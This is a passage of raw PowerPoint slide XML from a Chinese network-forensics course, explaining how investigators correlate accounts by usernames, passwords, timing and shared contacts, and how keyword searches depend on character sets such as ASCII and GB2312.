              <a:t>时间关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先确定事件发生的时间段，在此时间段内访问的文件、使用的各种网上账号都属于同一人所有。对于特定对象，如其上网时间跟某一事件发生时间有交叉，可以判断其参与了该事件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关系人关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在聊天工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AQUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，存在着好友列表。如果多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AQUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>账号中存在相同的与案件有关的关系人，则这些账号可能是同一人使用，也可能是同伙。如果多个涉案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AQUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>账号有相同的关系人，则这些关系人也很可能与案件有关。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总之，在多个事物中，可能会存在一定的关联性，在网络取证中，可以利用其中的一些关联，便于调查和分析工作的开展。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1252523"/>
            <a:ext cx="7200800" cy="2077492"/>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en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二、关键字搜索技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>关键字搜索是利用某一个或者某些特定的关键字，对一定范围内的信息进行搜索，查找出匹配关键字的内容的过程。进行关键字搜索还要注意选取的关键字不能太短，不能太常见，搜索前尽量缩小搜索范围，以提高搜索效率。另外，由于要搜索的文字可能使用不同的字符集和编码方式，因此同样的内容可能存在着多种形式。关键字搜索要先分析目标可能使用的字符集和编码方式，根据具体情况设定关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="548412"/>
            <a:ext cx="7200800" cy="4278094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、关联分析技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在电子数据的鉴定过程中，可以应用关联分析技术，对各种线索进行关联分析，发掘同一事件的不同数据间的联系。在关联分析时，可以从以下方面考虑：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    ①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户名关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特定对象在选取用户名时，可能会采用自己喜欢的某个词或者与自己有直接关系的词（如：姓名、姓名拼音、姓名拼音缩写、地址、生日等）作为用户名，因此，特定对象的不同用户名间，可能会有相同或相似之处。对于不常见的同名账号，基本上可以认定是同一个人使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特定对象在选取密码时，可能会采用与自己有直接关系的一段数字字母（如：自己生日、好友生日、电话号码、手机号码、姓名、姓名缩写等）或者自己喜欢的某个词，因此，对于特定对象的多个密码之间，可能会具有一些相同或相似的特征。对于使用相同的复杂密码的账号，基本上可以认定是同一个人使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先确定事件发生的时间段，在此时间段内访问的文件、使用的各种网上账号都属于同一人所有。对于特定对象，如其上网时间跟某一事件发生时间有交叉，可以判断其参与了该事件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关系人关联：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在聊天工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AQUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，存在着好友列表。如果多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AQUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>账号中存在相同的与案件有关的关系人，则这些账号可能是同一人使用，也可能是同伙。如果多个涉案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AQUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>账号有相同的关系人，则这些关系人也很可能与案件有关。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总之，在多个事物中，可能会存在一定的关联性，在网络取证中，可以利用其中的一些关联，便于调查和分析工作的开展。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </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6.4.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技术问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1002383"/>
            <a:ext cx="7200800" cy="3370153"/>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zh-CN" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是指文字的集合，对每一个文字都给予固定的内码。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNICODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等都是字符集。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是美国制定的标准字符集，每个字符占用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节。目前英文、数字都使用该字符集。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GB2312</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是国家制定发布的字符集，每个文字占用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
